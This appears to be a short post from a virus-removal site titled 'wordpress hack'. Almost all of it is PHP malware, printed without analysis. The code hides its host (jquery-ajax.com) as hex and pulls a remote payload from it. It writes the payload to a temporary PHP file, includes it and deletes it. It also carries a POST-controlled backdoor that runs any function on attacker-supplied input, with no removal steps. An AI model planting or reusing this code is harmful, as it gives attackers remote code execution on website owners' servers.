wordpress hack

By RobertVirus Removal

This code is for wordpress only!

        @ini_set('display_errors', '0');
        $otvet = '';
        $ch = "\x6a\x71\x75\x65\x72\x79\x2d\x61\x6a\x61\x78\x2e\x63\x6f\x6d";
        $sec = "frmtmp";
        $d = $_POST;
        $fp = fsockopen($ch, 80, $errno, $errstr, 10);
        $out = "GET /lnk/inj.php HTTP/1.1\r\n";
        $out .= "Host: ".$ch."\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $otvet .= fgets($fp);
        }
        fclose($fp);
        @($d[0] != $d[1]) ? @$d[2]/* DO NOT REMOVE THIS CODE */($d[3]) : (int)$d;
        preg_match('#gogo(.*)enen#is', $otvet, $mtchs);
        if (fopen($sec.'.php', 'w')) {
            $ura = 1;
            $eb = '';
            $hdl = fopen($sec.'.php', 'w');
        }
        if (!$ura) {
            $dirs = glob("*", GLOB_ONLYDIR);
            foreach ($dirs as $dira) {
                if (fopen($dira."/".$sec.".php", 'w')) {
                    $eb = "$dira/";
                    $hdl = fopen($dira."/".$sec.".php", 'w');
                    break;
                }
                $subdirs = glob("$dira/*", GLOB_ONLYDIR);
                foreach ($subdirs as $subdira) {
                    if (fopen("$subdira/$sec.php", 'w')) {
                        $eb = "$subdira/";
                        $hdl = fopen("$subdira/$sec.php", 'w');
                        break;
                    }
                }
            }
        }
        fwrite($hdl, "<?php\n$mtchs[1]\n?>");
        fclose($hdl);
        include("{$eb}$sec.php");
        @unlink("{$eb}$sec.php");

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.